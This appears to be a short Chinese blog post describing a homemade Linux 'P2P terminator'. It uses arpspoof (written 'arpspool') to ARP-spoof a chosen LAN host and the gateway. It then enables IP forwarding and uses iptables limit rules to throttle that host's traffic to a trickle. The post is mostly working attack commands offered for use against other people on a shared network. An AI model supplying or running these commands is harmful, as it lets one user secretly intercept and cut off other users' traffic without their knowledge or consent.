很长一段时间,都在渴望一个 for Linux 的 P2P 终结者。
但是,谁让我们是小众群体呢?所以,没有。
但是,今天我突发奇想,找到了!用脚本实现了 P2P 终结者!
问题是这样的,首先我需要一个 arp 欺骗工具。呵呵, dsniff 就是!
执行 arpspoof 就可以进行 ARP 欺骗了。 不过,呵呵,我只对需要控制的主机进行 ARP 欺骗,比如 192.168.1.100
arpspool -i eth0 -t 192.168.1.100 192.168.1.1
arpspool -i eth0 -t 192.168.1.1 192.168.1.100
这样成功的让 192.168.1.100 到 192.168.1.1 之间的通讯全部通过自己了
然后,我打开 内核的 IP 转发。 echo 1 > /proc/sys/net/ipv4/ip_forward
呵呵,现在,怎么限速就是我的事情啦! 可以使用 tc 限速,也可以简单的时候 iptables 限速! 比如,使用 iptables 的 limit 匹配模块来限速. 一秒钟是能发送和接收 3 个数据包,这样速度就限制到 4k/s 了
iptables -A FORWARD -s 192.168.1.100 -m limit --limit 3/s -j ACCEPT
iptables -A FORWARD -d 192.168.1.100 -m limit --limit 3/s -j ACCEPT
iptables -A FORWARD -s 192.168.1.100 -j DROP
iptables -A FORWARD -d 192.168.1.100 -j DROP